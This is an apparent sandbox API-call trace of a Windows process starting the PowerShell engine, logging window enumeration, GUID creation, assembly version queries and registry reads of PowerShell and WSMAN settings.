	[0040.033] GetWindowThreadProcessId (in: hWnd=0x20044, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xbc8
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x958
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x50226, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x638
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x400f8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf20
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x60204, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xe38
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x90042, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xe38
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x9a4
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc44
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x2021a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc2c
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x20214, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xa94
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x4017c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc20
	[0040.034] GetWindowThreadProcessId (in: hWnd=0x801fa, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x610
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x30028, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfe8
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x30034, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfc4
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x40026, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfb0
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x3002c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf90
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x2020c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf7c
	[0040.035] GetWindowThreadProcessId (in: hWnd=0x20210, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf64
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x20162, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf48
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x301ba, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf28
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x20150, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf0c
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xef8
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xee4
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x4006e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xed0
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x40016, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xebc
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x4009a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xea8
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x3019c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xe94
	[0040.036] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb98
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb78
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x94c
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8c8
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x860
	[0040.037] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x15057081930, Length=0x20000, ResultLength=0x184b47d8c0 | out: SystemInformation=0x15057081930, ResultLength=0x184b47d8c0*=0x18480) returned 0x0
	[0040.056] WerSetFlags () returned 0x0
	[0040.057] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0040.066] CoTaskMemFree (pv=0x0) 
	[0040.067] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x184b47d928, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x184b47d920 | out: pulNumLanguages=0x184b47d928, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x184b47d920) returned 1
	[0040.067] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x184b47d928, pwszLanguagesBuffer=0x150470af7a0, pcchLanguagesBuffer=0x184b47d920 | out: pulNumLanguages=0x184b47d928, pwszLanguagesBuffer=0x150470af7a0, pcchLanguagesBuffer=0x184b47d920) returned 1
	[0040.074] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47aad8 | out: phkResult=0x184b47aad8*=0x0) returned 0x2
	[0040.076] GetUserDefaultLocaleName (in: lpLocaleName=0x184b47d840, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0040.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c760, nSize=0x80 | out: lpBuffer="\xc9c8\x4b47\x18") returned 0x0
	[0040.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c760, nSize=0x80 | out: lpBuffer="ᐬ䜇Ő") returned 0x0
	[0040.332] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0xbdb89f52, Data2=0x640d, Data3=0x41e6, Data4=([0]=0xa1, [1]=0x36, [2]=0x32, [3]=0xc5, [4]=0x93, [5]=0x17, [6]=0x5a, [7]=0xb2))) returned 0x0
	[0040.337] EtwEventRegister (in: ProviderId=0x150470d0548, EnableCallback=0x1505f5a3f5c, CallbackContext=0x0, RegHandle=0x150470d0528 | out: RegHandle=0x150470d0528) returned 0x0
	[0040.337] EtwEventSetInformation (RegHandle=0x2501504553f730, InformationClass=0x2, EventInformation=0x150470d04c0, InformationLength=0x41) returned 0x0
	[0040.677] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x26e92a87, Data2=0x2a92, Data3=0x435c, Data4=([0]=0xb5, [1]=0x15, [2]=0x52, [3]=0x21, [4]=0x23, [5]=0xb3, [6]=0x1e, [7]=0xb5))) returned 0x0
	[0040.691] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x85203993, Data2=0xbe97, Data3=0x4c57, Data4=([0]=0xa2, [1]=0x2b, [2]=0x27, [3]=0x82, [4]=0x46, [5]=0xda, [6]=0xf2, [7]=0xd3))) returned 0x0
	[0040.694] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x105b35c4, Data2=0x2e93, Data3=0x4fcf, Data4=([0]=0xb7, [1]=0x9b, [2]=0x80, [3]=0xf5, [4]=0x41, [5]=0x35, [6]=0x3e, [7]=0x4b))) returned 0x0
	[0040.738] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0xf27c53e2, Data2=0x2432, Data3=0x474f, Data4=([0]=0x93, [1]=0x58, [2]=0xb9, [3]=0xd1, [4]=0xd1, [5]=0x6e, [6]=0xbd, [7]=0xee))) returned 0x0
	[0040.748] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x75d4b5c, Data2=0xcea1, Data3=0x4192, Data4=([0]=0xa7, [1]=0xf4, [2]=0xb, [3]=0xa4, [4]=0x49, [5]=0x50, [6]=0x25, [7]=0x1c))) returned 0x0
	[0040.753] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x6e8e4339, Data2=0xb49, Data3=0x4c53, Data4=([0]=0x90, [1]=0xc1, [2]=0x66, [3]=0x4d, [4]=0xe9, [5]=0x25, [6]=0x1d, [7]=0xe2))) returned 0x0
	[0040.755] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x18e7de57, Data2=0x7d85, Data3=0x4571, Data4=([0]=0xbb, [1]=0x3, [2]=0xf4, [3]=0xd8, [4]=0xce, [5]=0x94, [6]=0x5a, [7]=0xb5))) returned 0x0
	[0040.755] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x31b13c1, Data2=0x2921, Data3=0x431a, Data4=([0]=0x8d, [1]=0xa4, [2]=0x4, [3]=0x31, [4]=0xcd, [5]=0x16, [6]=0x7d, [7]=0xc8))) returned 0x0
	[0040.755] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x2d017db, Data2=0x64a1, Data3=0x427b, Data4=([0]=0xb5, [1]=0x3, [2]=0x17, [3]=0xe3, [4]=0x16, [5]=0xa9, [6]=0x2b, [7]=0x47))) returned 0x0
	[0040.755] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x93bab0b9, Data2=0x46c0, Data3=0x40e4, Data4=([0]=0x9f, [1]=0xec, [2]=0xa9, [3]=0x74, [4]=0xcb, [5]=0xa2, [6]=0x39, [7]=0xe2))) returned 0x0
	[0040.755] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xeb4458d5, Data2=0xc42b, Data3=0x4768, Data4=([0]=0xb0, [1]=0x5d, [2]=0x6a, [3]=0x58, [4]=0xc9, [5]=0x8d, [6]=0x18, [7]=0x59))) returned 0x0
	[0040.756] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xea5384f3, Data2=0x1561, Data3=0x44e6, Data4=([0]=0xa6, [1]=0x6b, [2]=0xa4, [3]=0x6, [4]=0x5c, [5]=0xd, [6]=0x30, [7]=0x4b))) returned 0x0
	[0040.756] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x7a7315cf, Data2=0xe93c, Data3=0x4538, Data4=([0]=0xb9, [1]=0x28, [2]=0x28, [3]=0xd3, [4]=0x70, [5]=0x68, [6]=0x4e, [7]=0x55))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x2a21ff71, Data2=0x51b0, Data3=0x4e93, Data4=([0]=0x9b, [1]=0xe9, [2]=0x0, [3]=0xfb, [4]=0x29, [5]=0x17, [6]=0x9c, [7]=0x33))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xa39355e4, Data2=0x50ba, Data3=0x4e5a, Data4=([0]=0xb1, [1]=0x1e, [2]=0x49, [3]=0x72, [4]=0xdc, [5]=0xc0, [6]=0xa5, [7]=0x45))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xede6c818, Data2=0x821e, Data3=0x475a, Data4=([0]=0xb9, [1]=0x9f, [2]=0xc, [3]=0xe5, [4]=0x7b, [5]=0x24, [6]=0xe9, [7]=0xd0))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x566f2905, Data2=0x6efb, Data3=0x4f47, Data4=([0]=0xac, [1]=0x2, [2]=0xfa, [3]=0x16, [4]=0x6, [5]=0x2e, [6]=0x80, [7]=0xa8))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x4367aaf0, Data2=0xccea, Data3=0x4d90, Data4=([0]=0xa7, [1]=0x3f, [2]=0x7a, [3]=0x87, [4]=0x4b, [5]=0x25, [6]=0xa, [7]=0x10))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xb83f58c4, Data2=0xa2ff, Data3=0x4549, Data4=([0]=0xba, [1]=0xd5, [2]=0x33, [3]=0xee, [4]=0x93, [5]=0xc1, [6]=0x8, [7]=0xe6))) returned 0x0
	[0040.757] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x6efd5838, Data2=0x9d7e, Data3=0x4322, Data4=([0]=0xa5, [1]=0xf4, [2]=0x96, [3]=0x29, [4]=0x7e, [5]=0xc3, [6]=0xc7, [7]=0xfe))) returned 0x0
	[0040.759] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x7470badd, Data2=0xb5d4, Data3=0x4ffb, Data4=([0]=0x87, [1]=0x1d, [2]=0x7d, [3]=0xb, [4]=0x21, [5]=0xe7, [6]=0x9f, [7]=0x29))) returned 0x0
	[0040.759] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xb3f9163b, Data2=0x29ce, Data3=0x4b5e, Data4=([0]=0xa3, [1]=0xe3, [2]=0xc, [3]=0x85, [4]=0x53, [5]=0x35, [6]=0xe4, [7]=0x2b))) returned 0x0
	[0040.759] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x6cf8016d, Data2=0x26cb, Data3=0x4cd4, Data4=([0]=0xb6, [1]=0x7f, [2]=0xc, [3]=0xb1, [4]=0xf1, [5]=0xa0, [6]=0x7e, [7]=0x53))) returned 0x0
	[0040.759] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x5df751ba, Data2=0xfb35, Data3=0x4c93, Data4=([0]=0xb4, [1]=0x36, [2]=0x55, [3]=0x97, [4]=0xd2, [5]=0xa7, [6]=0x5a, [7]=0x5b))) returned 0x0
	[0040.759] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xab250bc6, Data2=0x7607, Data3=0x4704, Data4=([0]=0xb4, [1]=0x66, [2]=0xf7, [3]=0xd9, [4]=0xaa, [5]=0xf7, [6]=0xbc, [7]=0x15))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x6f34b3da, Data2=0x5488, Data3=0x430a, Data4=([0]=0x84, [1]=0xdd, [2]=0x55, [3]=0x84, [4]=0x54, [5]=0x3f, [6]=0x2, [7]=0x25))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xe864d8b5, Data2=0xc7ce, Data3=0x491c, Data4=([0]=0xb1, [1]=0x93, [2]=0x60, [3]=0x19, [4]=0xec, [5]=0x57, [6]=0xd3, [7]=0xca))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x1743ce49, Data2=0x3e68, Data3=0x4e8e, Data4=([0]=0xa8, [1]=0x30, [2]=0xb, [3]=0xf2, [4]=0xd0, [5]=0x2a, [6]=0x90, [7]=0x4b))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x2745c67e, Data2=0x3281, Data3=0x4878, Data4=([0]=0x85, [1]=0xdc, [2]=0x35, [3]=0xbf, [4]=0xbe, [5]=0x91, [6]=0xa8, [7]=0x49))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x4dec737d, Data2=0x8d89, Data3=0x42b9, Data4=([0]=0x87, [1]=0x61, [2]=0x79, [3]=0x65, [4]=0x1f, [5]=0x45, [6]=0xd3, [7]=0x41))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xf20a6d9, Data2=0xe6b3, Data3=0x47ba, Data4=([0]=0x9f, [1]=0x87, [2]=0xff, [3]=0xc, [4]=0x12, [5]=0x6b, [6]=0xfb, [7]=0x8d))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x25547a40, Data2=0x9f50, Data3=0x42d6, Data4=([0]=0x9a, [1]=0x80, [2]=0xcc, [3]=0x2c, [4]=0xfb, [5]=0x9c, [6]=0x9b, [7]=0x2a))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x6c8b5f10, Data2=0x7be3, Data3=0x4413, Data4=([0]=0xbf, [1]=0x80, [2]=0x3d, [3]=0xd7, [4]=0xff, [5]=0x81, [6]=0x9, [7]=0x93))) returned 0x0
	[0040.760] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0x193a4f3e, Data2=0x399a, Data3=0x4356, Data4=([0]=0xa0, [1]=0xfe, [2]=0x69, [3]=0xd0, [4]=0xba, [5]=0x62, [6]=0xa5, [7]=0x9a))) returned 0x0
	[0040.761] CoCreateGuid (in: pguid=0x184b47c788 | out: pguid=0x184b47c788*(Data1=0xebe46db5, Data2=0x8308, Data3=0x47ab, Data4=([0]=0xa4, [1]=0x9f, [2]=0x74, [3]=0x68, [4]=0xb9, [5]=0xec, [6]=0x2e, [7]=0xf9))) returned 0x0
	[0040.761] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x770f49d5, Data2=0x2b90, Data3=0x45ab, Data4=([0]=0x99, [1]=0xf9, [2]=0xb, [3]=0x74, [4]=0x39, [5]=0xd2, [6]=0x3, [7]=0x9c))) returned 0x0
	[0040.761] CoCreateGuid (in: pguid=0x184b47c758 | out: pguid=0x184b47c758*(Data1=0x770d922c, Data2=0x5b97, Data3=0x47d2, Data4=([0]=0xb1, [1]=0x69, [2]=0x90, [3]=0x1d, [4]=0x21, [5]=0xcb, [6]=0x1b, [7]=0xf8))) returned 0x0
	[0040.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c410, nSize=0xfa | out: lpBuffer="\xc520\x4b47\x18") returned 0x0
	[0040.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0040.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0040.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47c6a0) returned 1
	[0040.773] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47c780 | out: lpFileInformation=0x184b47c780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2ef73f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6d2a00)) returned 1
	[0040.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47c660) returned 1
	[0040.774] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x184b47c858 | out: lpdwHandle=0x184b47c858) returned 0x93c
	[0040.774] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x93c, lpData=0x150471bf1e0 | out: lpData=0x150471bf1e0) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184b47c7d8, puLen=0x184b47c7d0 | out: lplpBuffer=0x184b47c7d8*=0x150471bf27c, puLen=0x184b47c7d0) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf358, puLen=0x184b47c770) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf3ac, puLen=0x184b47c770) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf408, puLen=0x184b47c770) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf444, puLen=0x184b47c770) returned 1
	[0040.775] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf4ac, puLen=0x184b47c770) returned 1
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf548, puLen=0x184b47c770) returned 1
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf5ac, puLen=0x184b47c770) returned 1
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf628, puLen=0x184b47c770) returned 1
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf2d4, puLen=0x184b47c770) returned 1
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x0, puLen=0x184b47c770) returned 0
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x0, puLen=0x184b47c770) returned 0
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x0, puLen=0x184b47c770) returned 0
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184b47c728, puLen=0x184b47c720 | out: lplpBuffer=0x184b47c728*=0x150471bf27c, puLen=0x184b47c720) returned 1
	[0040.776] VerLanguageNameW (in: wLang=0x0, szLang=0x184b47c450, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0040.776] VerQueryValueW (in: pBlock=0x150471bf1e0, lpSubBlock="\\", lplpBuffer=0x184b47c778, puLen=0x184b47c770 | out: lplpBuffer=0x184b47c778*=0x150471bf208, puLen=0x184b47c770) returned 1
	[0040.778] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47c7a8 | out: phkResult=0x184b47c7a8*=0x274) returned 0x0
	[0040.779] RegQueryValueExW (in: hKey=0x274, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x184b47c7f8, lpData=0x0, lpcbData=0x184b47c7f0*=0x0 | out: lpType=0x184b47c7f8*=0x1, lpData=0x0, lpcbData=0x184b47c7f0*=0x8) returned 0x0
	[0040.779] RegQueryValueExW (in: hKey=0x274, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x184b47c7f8, lpData=0x150471c1610, lpcbData=0x184b47c7f0*=0x8 | out: lpType=0x184b47c7f8*=0x1, lpData="3.0", lpcbData=0x184b47c7f0*=0x8) returned 0x0
	[0040.779] RegCloseKey (hKey=0x274) returned 0x0
	[0040.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d708 | out: phkResult=0x184b47d708*=0x274) returned 0x0
	[0040.779] RegQueryValueExW (in: hKey=0x274, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d758, lpData=0x0, lpcbData=0x184b47d750*=0x0 | out: lpType=0x184b47d758*=0x1, lpData=0x0, lpcbData=0x184b47d750*=0x56) returned 0x0
	[0040.780] RegQueryValueExW (in: hKey=0x274, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d758, lpData=0x150471c19c0, lpcbData=0x184b47d750*=0x56 | out: lpType=0x184b47d758*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d750*=0x56) returned 0x0
	[0040.780] RegCloseKey (hKey=0x274) returned 0x0
	[0040.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184b47c4b0, nSize=0xfa | out: lpBuffer="\xc5c0\x4b47\x18") returned 0x0
	[0040.783] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d678 | out: phkResult=0x184b47d678*=0x0) returned 0x2
